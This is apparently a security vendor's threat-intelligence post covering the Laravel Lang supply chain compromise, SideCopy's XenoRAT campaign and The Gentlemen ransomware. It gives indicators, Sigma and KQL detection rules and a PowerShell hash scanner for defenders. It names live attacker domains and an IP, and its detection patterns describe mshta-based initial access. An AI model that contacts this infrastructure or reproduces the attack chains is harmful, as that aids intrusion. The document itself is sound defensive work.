Back to Intelligence

Laravel Supply Chain Attack, SideCopy XenoRAT, and The Gentlemen RaaS: OTX Pulse Analysis

SA
Security Arsenal Team
May 30, 2026
5 min read

This week's OTX pulses highlight a diverse and aggressive threat landscape ranging from widespread software supply chain compromises to nation-state espionage and the expansion of ransomware-as-a-service (RaaS). The Laravel developer ecosystem has been breached with remote code execution (RCE) backdoors facilitating information theft across hundreds of package versions. Geopolitically, the SideCopy APT group (linked to Transparent Tribe) is intensifying campaigns against Afghanistan's Ministry of Finance using Pashto-language lures to deploy XenoRAT. Simultaneously, financially motivated actors are advancing The Gentlemen RaaS operation (Storm-2697), which utilizes self-propagating Go-based encryptors to target critical infrastructure sectors.

Threat Actor / Malware Profile

Laravel Lang Compromise (Supply Chain)

  • Distribution: Malicious packages pushed to official repositories via compromised developer credentials, specifically targeting laravel-lang dependencies.
  • Payload Behavior: Delivers helpers.php (stealer) and DebugChromium.exe. Establishes RCE allowing arbitrary command execution on the victim host.
  • C2 Communication: Connects to flipboxstudio.info for payload retrieval and exfiltration.

SideCopy (APT36 / Transparent Tribe)

  • Distribution: Spear-phishing emails containing weaponized LNK files disguised as staff directories. Uses Pashto-language themes to target Afghan government entities.
  • Payload Behavior: Multi-stage loader starting with LNK execution, spawning mshta.exe to fetch remote HTA payloads from compromised Afghan education infrastructure (abimj.edu.af). Deploys XenoRAT.
  • Persistence: Likely via registry run keys or scheduled tasks established by the HTA payload.

The Gentlemen (Storm-2697)

  • Distribution: Aggressive self-propagation mechanisms across networks (likely exploiting SMB/RDP or removable media).
  • Payload Behavior: Go-language ransomware using Curve25519 for key exchange and XChaCha20 for stream encryption. Designed for broad, automated compromise.
  • RaaS Model: Operates as a service, recruiting affiliates via dark web forums (BreachForums).

IOC Analysis

The provided indicators span infrastructure, file hashes, and network artifacts critical for detection:

  • Domains & URLs: flipboxstudio.info serves as the C2/exfil node for the Laravel campaign. abimj.edu.af is a compromised domain acting as a download server for SideCopy payloads. SOC teams should block these domains at the proxy/DNS level and hunt for historical DNS requests.
  • IP Addresses: 103.132.98.224 is associated with the SideCopy C2 infrastructure. Block this IP on perimeter firewalls.
  • File Hashes: Multiple SHA256, MD5, and SHA1 hashes are provided for the XenoRAT payload, The Gentlemen encryptor, and stealer components (DebugChromium.exe). These should be loaded into EDR solutions for immediate scanning.

Tooling: Sigma rules can be used to detect process behaviors. YARA rules can be generated from the file hashes for memory scanning. SIEMs (Splunk, Sentinel) should correlate network connections to the listed domains with process creation events.

Detection Engineering

YAML
---
title: Potential Laravel Lang Compromise - DebugChromium Execution
id: 91a3b4c5-d6e7-4f8a-9a0b-1c2d3e4f5a6b
status: stable
description: Detects execution of DebugChromium.exe, a known payload from the compromised Laravel Lang packages.
references:
    - https://socket.dev/blog/laravel-lang-compromise
author: Security Arsenal
date: 2026/05/31
modified: 2026/05/31
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\DebugChromium.exe'
    condition: selection
falsepositives:
    - Legitimate Chromium debug instances (rare)
level: high
---
title: SideCopy APT - Mshta.exe Suspicious Execution
id: a1b2c3d4-e5f6-4a5b-8c9d-0e1f2a3b4c5d
status: stable
description: Detects mshta.exe execution with network connections or spawned from LNK/Office processes, indicative of SideCopy initial access.
references:
    - https://www.seqrite.com/blog/operation-xenofiscal-sidecopy-deploying-persistent-xenorat-targeting-the-mof-afghanistan/
author: Security Arsenal
date: 2026/05/31
modified: 2026/05/31
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        Image|endswith: '\mshta.exe'
    selection_parent:
        ParentImage|endswith:
            - '\winword.exe'
            - '\excel.exe'
            - '\powershell.exe'
            - '\cmd.exe'
    selection_net:
        DestinationHostname|contains:
            - '.edu.af'
    condition: 1 of selection*
falsepositives:
    - Administrative troubleshooting
level: high
---
title: The Gentlemen Ransomware - Go Binary Suspicious Activity
id: b2c3d4e5-f6a7-4b5c-9d0e-1f2a3b4c5d6e
status: stable
description: Detects characteristics of The Gentlemen ransomware, a Go-based encryptor with self-propagating capabilities.
references:
    - https://www.microsoft.com/en-us/security/blog/2026/05/28/the-gentlemen-ransomware-dissecting-a-self-propagating-go-encryptor/
author: Security Arsenal
date: 2026/05/31
modified: 2026/05/31
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '.exe'
        Company: ''
    filter_legit:
        Product:
            - 'Microsoft Windows'
            - 'Microsoft '
    condition: selection and not filter_legit
falsepositives:
    - Other unsigned utilities
level: medium


kql
// Hunt for Laravel C2 and SideCopy Infrastructure
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemoteUrl has "flipboxstudio.info" or 
          RemoteUrl has "abimj.edu.af" or 
          RemoteIP == "103.132.98.224"
| project Timestamp, DeviceName, InitiatingProcessFileName, RemoteUrl, RemoteIP

// Hunt for SideCopy Initial Access (Mshta)
DeviceProcessEvents 
| where Timestamp > ago(7d)
| where FileName == "mshta.exe"
| where InitiatingProcessFileName in ("winword.exe", "excel.exe", "cmd.exe", "powershell.exe")
| project Timestamp, DeviceName, FileName, ProcessCommandLine, InitiatingProcessFileName

// Hunt for The Gentlemen Ransomware Hashes
DeviceFileEvents
| where Timestamp > ago(7d)
| where SHA256 in ("22b38dad7da097ea03aa28d0614164cd25fafeb1383dbc15047e34c8050f6f67", 
                      "fe1033335a045c696c900d435119d210361966e2fb5cd1ba3382608cfa2c8e68")
| project Timestamp, DeviceName, FileName, FolderPath, SHA256


powershell
# IOC Hunt Script for The Gentlemen and Laravel Malware
$TargetHashes = @(
    "22b38dad7da097ea03aa28d0614164cd25fafeb1383dbc15047e34c8050f6f67",
    "fe1033335a045c696c900d435119d210361966e2fb5cd1ba3382608cfa2c8e68",
    "7a262d4cbbc4808932b6af42c4041f06",
    "3b4194bdfe40d94031a94b30397ffd8a4b09d0a4057668e897b8bdcd1703dd01",
    "99127c8c67d90e2776beeb85281f9c68399bf4567b07a6b638d68b760212e88d",
    "0b937b7da4602a8aa5346681b13a3466",
    "14ce728a416b1f13e8645f3f7b860a37"
)

Write-Host "[+] Scanning for malicious file hashes..." -ForegroundColor Cyan

$Drives = Get-PSDrive -PSProvider FileSystem | Select-Object -ExpandProperty Root

foreach ($Drive in $Drives) {
    Write-Host "Scanning $Drive..." -ForegroundColor Yellow
    Get-ChildItem -Path $Drive -Recurse -ErrorAction SilentlyContinue | 
        Where-Object { -not $_.PSIsContainer } | 
        ForEach-Object {
            $Hash = (Get-FileHash -Path $_.FullName -Algorithm SHA256 -ErrorAction SilentlyContinue).Hash
            if ($Hash -in $TargetHashes) {
                Write-Host "[!] MALICIOUS FILE FOUND: $($_.FullName) | Hash: $Hash" -ForegroundColor Red
            }
        }
}

Write-Host "[+] Checking for Laravel Compromise Artifacts (DebugChromium.exe)..." -ForegroundColor Cyan
$LaravelPath = "C:\Users\*\AppData\Roaming\DebugChromium.exe"
if (Test-Path $LaravelPath) {
    Write-Host "[!] Laravel Malware Detected at $LaravelPath" -ForegroundColor Red
}

Response Priorities

  • Immediate:

    • Block all listed domains (flipboxstudio.info, abimj.edu.af) and IP addresses (103.132.98.224) at the network perimeter.
    • Run the PowerShell script or EDR scans across all endpoints to identify malware files.
    • Isolate any devices showing communication to the Laravel C2 or SideCopy infrastructure.

  • 24 Hours:

    • Conduct a credential audit for developer accounts with access to laravel-lang repositories; rotate API tokens and SSH keys immediately.
    • Investigate the Afghan Ministry of Finance network segment for lateral movement signs consistent with XenoRAT.

  • 1 Week:

    • Implement strict dependency pinning and integrity verification (SBOM) for all software supply chains.
    • Review and patch SMB/RDP vulnerabilities to mitigate self-propagation vectors used by The Gentlemen ransomware.
    • Conduct threat hunting for unpatched systems vulnerable to RaaS tooling propagation.

Related Resources

Security Arsenal Incident Response Managed SOC & MDR Services AlertMonitor Threat Detection From The Dark Side Intel Hub

darkwebotx-pulsedarkweb-malwarexenoratgentlemen-ransomwaresupply-chainsidecopylaravel

Is your security operations ready?

Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.

Book a SOC AssessmentSee AlertMonitor in Action